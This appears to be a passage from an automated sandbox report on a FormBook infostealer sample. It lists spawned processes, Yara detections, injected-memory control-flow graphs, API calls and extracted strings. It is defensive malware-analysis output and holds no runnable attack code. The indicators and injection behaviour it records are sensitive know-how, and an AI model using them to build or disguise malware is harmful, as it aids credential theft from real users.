                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:11:35:33
                                                                            Start date:06/12/2024
                                                                            Path:C:\Windows\SysWOW64\regini.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                            Imagebase:0xc0000
                                                                            File size:41'472 bytes
                                                                            MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:11:35:47
                                                                            Start date:06/12/2024
                                                                            Path:C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe"
                                                                            Imagebase:0xcb0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:9
                                                                            Start time:11:36:09
                                                                            Start date:06/12/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6b1600000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:1.4%
                                                                              Dynamic/Decrypted Code Coverage:4.7%
                                                                              Signature Coverage:15%
                                                                              Total number of Nodes:127
                                                                              Total number of Limit Nodes:7

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 119 417913-41793c call 42f5f3 123 417942-417950 call 42fbf3 119->123 124 41793e-417941 119->124 127 417960-417971 call 42e093 123->127 128 417952-41795d call 42fe93 123->128 133 417973-417987 LdrLoadDll 127->133 134 41798a-41798d 127->134 128->127 133->134
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                              • Instruction ID: af326da7c132db295e391ced85ce7770f3b587b3f31b4282422e345026d71ec0
                                                                              • Opcode Fuzzy Hash: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                              • Instruction Fuzzy Hash: C50152B1E4010DABDF10DAA5DC42FDEB778AB14308F4041A6F90897241F679EB488B95

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 140 42c903-42c93c call 4046f3 call 42db83 NtClose
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C937
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction ID: cb036ad0cdd716a926f083ad66e86339c7f4d5c2c0d3a14b9e6433a91f40aa26
                                                                              • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction Fuzzy Hash: 07E04F752006147BC610EA5AEC01F9B775CDBC5714F404419FB48A7281C6B5791186F8

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 156 3a735c0-3a735cc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                              • Instruction ID: 8be3f98a60af97975ec109fd72819471920c05d00907bd7c21b7e5f0758742fa
                                                                              • Opcode Fuzzy Hash: ebce7f13fa05659ffeff7f52b65f0bbfe17cb251d2be97d1ebc7546275e37624
                                                                              • Instruction Fuzzy Hash: 1290023160550802D100B2584554746500A87D0301FA6C412A042456CD8B998A5165B2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 154 3a72b60-3a72b6c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                              • Instruction ID: f2f3aed07c35dfcbf5890919c288cb173e9f7752dfdc21db169de1d2204c02dc
                                                                              • Opcode Fuzzy Hash: 8d0f7406ee9ccafca5a2668ad6899c7002d2a07bf6a5384c6dffbe39a2afeaba
                                                                              • Instruction Fuzzy Hash: 43900261202404034105B2584454656800F87E0301B96C022E1014594DCA2989916135

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 155 3a72df0-3a72dfc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                              • Instruction ID: 7e6c41b1e2a895b3658c0bbefc5c344f7b2255cc5c1d8d85d620e24d36ff4704
                                                                              • Opcode Fuzzy Hash: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                              • Instruction Fuzzy Hash: DB90023120140813D111B2584544747400E87D0341FD6C413A042455CD9B5A8A52A131
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abc7424243bdd5187e45cd481ff0bb7572368b3398b4de36241f08ace9b41e6e
                                                                              • Instruction ID: 2449cd8cea76a8d29eff5d572b5a5a420931330bfacb590d528125b37f1bcbd6
                                                                              • Opcode Fuzzy Hash: abc7424243bdd5187e45cd481ff0bb7572368b3398b4de36241f08ace9b41e6e
                                                                              • Instruction Fuzzy Hash: B3F1B3B0E0421AAFDF24DB64CC85AFFB778AF44304F1482AEE515A7241DB746A81CF95

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 0-962170130
                                                                              • Opcode ID: 62086ea6164a6b55162337466ac6d99804c49254ae63c5d10560bf1a207cbe4b
                                                                              • Instruction ID: 3734ddf9b67ff786c0daef5b36f05ed51fcebabd7f310d1d9df2a0438136e3ca
                                                                              • Opcode Fuzzy Hash: 62086ea6164a6b55162337466ac6d99804c49254ae63c5d10560bf1a207cbe4b
                                                                              • Instruction Fuzzy Hash: 0E4152718013657BC7029FB8CC849DBBF78EE927A4718015EEA409F353E22989C7CB85

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 1836367815-962170130
                                                                              • Opcode ID: 4ecf56fba355219f401ddbbca44f987cd04b3eaaab059dd1a3329575f73ce29d
                                                                              • Instruction ID: 35238bee879f9cb4b8c33a7d52a63e84c9799adef20dca56b86e1aa432f083fb
                                                                              • Opcode Fuzzy Hash: 4ecf56fba355219f401ddbbca44f987cd04b3eaaab059dd1a3329575f73ce29d
                                                                              • Instruction Fuzzy Hash: 42113AB6E012147AD711AA908C829EF773CEA927B4B10416AFA14E7241E63C4E824BE5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 69 414163-414195 call 42eab3 call 42f4c3 74 41419b-4141cd call 4046a3 call 425063 69->74 75 414196 call 417913 69->75 81 4141ed-4141f3 74->81 82 4141cf-4141de PostThreadMessageW 74->82 75->74 82->81 83 4141e0-4141ea 82->83 83->81
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 1836367815-962170130
                                                                              • Opcode ID: 4846da65e6cecb9ba5e53dbb1fdfa6a66c03f359dfcd8300b4ab8b61d39b8611
                                                                              • Instruction ID: eabf58b107c7c6da68bb626667c27e82debd11fa10f39ea43f99fe1032a0b2d9
                                                                              • Opcode Fuzzy Hash: 4846da65e6cecb9ba5e53dbb1fdfa6a66c03f359dfcd8300b4ab8b61d39b8611
                                                                              • Instruction Fuzzy Hash: 0F0104B5D0111C7ADB10AAE19C81DEFBB7CEF41398F448069FA04B7241D6784F468BA5

                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                              control_flow_graph 84 42cc93-42ccd4 call 4046f3 call 42db83 RtlFreeHeap
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CCCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: dfA
                                                                              • API String ID: 3298025750-2195916745
                                                                              • Opcode ID: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                              • Instruction ID: 9badaf320af6d19ba30922152393b4c4b817bbc5f8a679b733ed37b1423509a0
                                                                              • Opcode Fuzzy Hash: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                              • Instruction Fuzzy Hash: 1AE092B22002047BC614EE59DC41FAB77ADEFC5714F000419FA08A7241D774B910C7B8

                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                              control_flow_graph 98 417993-4179a8 99 417951-417957 98->99 100 4179aa-4179b0 98->100 103 41795d-417971 call 42e093 99->103 104 417958 call 42fe93 99->104 101 4179b2-4179dc 100->101 102 4179dd 100->102 101->102 106 417989 102->106 107 4179df-4179e8 102->107 109 41798a-41798d 103->109 116 417973-417987 LdrLoadDll 103->116 104->103 106->109 110 4179ea-417a1e 107->110 111 417a4c-417a4f 107->111 114 417ab1-417ace call 42b8c3 111->114 115 417a51-417a57 111->115 115->114 116->109
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: a09e5713e9d6b45433918cc3a871e07cdb4f2e923259d934ad70dc4dfbac3a66
                                                                              • Instruction ID: 8e2e7eca41e65fd1a7cba35ee64e9ef6a7c9e77ccfa9966d1d506597efe0b44c
                                                                              • Opcode Fuzzy Hash: a09e5713e9d6b45433918cc3a871e07cdb4f2e923259d934ad70dc4dfbac3a66
                                                                              • Instruction Fuzzy Hash: F031DEF6648206FAC711DB749C42FCBBFB8EB41300F14426BE8098B142E634D54A87E9

                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                              control_flow_graph 135 42cc43-42cc87 call 4046f3 call 42db83 RtlAllocateHeap
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,0041E731,?,?,00000000,?,0041E731,?,?,?), ref: 0042CC82
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                              • Instruction ID: b2575036bf5dcaf5ff4b630ad3bd5a7365a46971e8e9f3b7bb08ed937dad50fb
                                                                              • Opcode Fuzzy Hash: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                              • Instruction Fuzzy Hash: AAE06DB16002187BD714EF59EC41F9B77ACEFC6714F00441AFA09A7281D670B91086B8

                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                              control_flow_graph 145 42cce3-42cd1c call 4046f3 call 42db83 ExitProcess
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,2CB6EB11,?,?,2CB6EB11), ref: 0042CD17
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: 1d795ddcb259808af3833f40a7934c66429373065a909e14572eba194b240543
                                                                              • Instruction ID: 2142ba6bb06545a36fbe1fcd062f4bba4f286f26750a8e7fd8a17f6b67c315a7
                                                                              • Opcode Fuzzy Hash: 1d795ddcb259808af3833f40a7934c66429373065a909e14572eba194b240543
                                                                              • Instruction Fuzzy Hash: 34E086712006187BC510EA6ADC41FDBB75DDFC5724F014519FA08A7245CAB5B91187F4

                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                              control_flow_graph 150 3a72c0a-3a72c0f 151 3a72c11-3a72c18 150->151 152 3a72c1f-3a72c26 LdrInitializeThunk 150->152
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                              • Instruction ID: 6f5e2efa675efa3c8a7ba8ee2e8f84cee8cd93609338ab83b39bb35e1f488e02
                                                                              • Opcode Fuzzy Hash: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                              • Instruction Fuzzy Hash: 6AB09B719015C5C5DA11F7604A4C717790967D0701F5AC477D3030645E473DC5D1E175
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              • Opcode ID: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                                                              • Instruction ID: 3085a0817375a896473837cc336847bf042aed95b42707ce3926013e328532a8
                                                                              • Opcode Fuzzy Hash: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                                                              • Instruction Fuzzy Hash: 5D926B75604341ABD720DF24C984BAAB7FCBB84754F084D2FFA949B292D774E844CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-3089669407
                                                                              • Opcode ID: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                                                              • Instruction ID: 4cdf410707c7df4adb26691de4961464925a392cee14cac0e036656063747780
                                                                              • Opcode Fuzzy Hash: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                                                              • Instruction Fuzzy Hash: D48105B2D022187F9B21FB98EED4DEEB7BDAB19654B044527B910F7514D720ED048BA0
                                                                              Strings
                                                                              • IDwIDw@4Dw@4Dw, xrefs: 03AA5341, 03AA534D
                                                                              • 8, xrefs: 03AA52E3
                                                                              • Critical section address., xrefs: 03AA5502
                                                                              • Thread identifier, xrefs: 03AA553A
                                                                              • Critical section debug info address, xrefs: 03AA541F, 03AA552E
                                                                              • undeleted critical section in freed memory, xrefs: 03AA542B
                                                                              • Address of the debug info found in the active list., xrefs: 03AA54AE, 03AA54FA
                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54CE
                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 03AA5543
                                                                              • double initialized or corrupted critical section, xrefs: 03AA5508
                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54E2
                                                                              • corrupted critical section, xrefs: 03AA54C2
                                                                              • Invalid debug info address of this critical section, xrefs: 03AA54B6
                                                                              • Critical section address, xrefs: 03AA5425, 03AA54BC, 03AA5534
                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA540A, 03AA5496, 03AA5519
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$IDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-1535383429
                                                                              • Opcode ID: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                                                              • Instruction ID: 9880351710fdf7893f13d613f82f7bd5fea31d2acf8dd7b7dfcf0e71f185574a
                                                                              • Opcode Fuzzy Hash: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                                                              • Instruction Fuzzy Hash: A581BCB5E00758BFDB20CF98C940BAEBBB9FB49704F14415AF518BB241D379A940CB64
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                              • API String ID: 0-360209818
                                                                              • Opcode ID: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                                                              • Instruction ID: 552dca624339f647f9c008a499f4cbc42bbf98bde4bc394d710aa196421673fe
                                                                              • Opcode Fuzzy Hash: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                                                              • Instruction Fuzzy Hash: 77629EB6E006299FDB24CF18C8407A9B7B6EF95320F5982DFD449AB280D7365AD1CF50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                              • API String ID: 0-3591852110
                                                                              • Opcode ID: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                                                              • Instruction ID: 354955615d5b02836554ef9c6867f6872e4ee4c1aa768de67680e1769748330e
                                                                              • Opcode Fuzzy Hash: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                                                              • Instruction Fuzzy Hash: 6712AC74604662EFD725DF29C441BBABBF5FF0A714F08845EE4968B681D738E880CB60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                              • API String ID: 0-3197712848
                                                                              • Opcode ID: bdb621e8633e23c94a346d1efd3f11e4e6df76233c79242e06e582ccfafd1fbb
                                                                              • Instruction ID: 2c5fe55d5829b2facc561aa9e9db98a35adbad48e25e97794b1df0aeab541349
                                                                              • Opcode Fuzzy Hash: bdb621e8633e23c94a346d1efd3f11e4e6df76233c79242e06e582ccfafd1fbb
                                                                              • Instruction Fuzzy Hash: 6F12F271A083419FD724DF28C540BAAB7E8BFC5708F084A5FF8999B291E774D944CB62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                              • API String ID: 0-3532704233
                                                                              • Opcode ID: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                                                              • Instruction ID: 727d4895858d08c81bd493feaf36f0f3778aa07cf581a5b26443c63f147fa37d
                                                                              • Opcode Fuzzy Hash: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                                                              • Instruction Fuzzy Hash: E7B1AD729083619FC711EF28C980B6BBBE8BB88754F05492FF899DB341D774D9448B92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                              • API String ID: 0-1357697941
                                                                              • Opcode ID: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
                                                                              • Instruction ID: eb56436a0fbab5d3218fa807db58635396c5740f78a8e0eddcfe9a1b254c8353
                                                                              • Opcode Fuzzy Hash: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
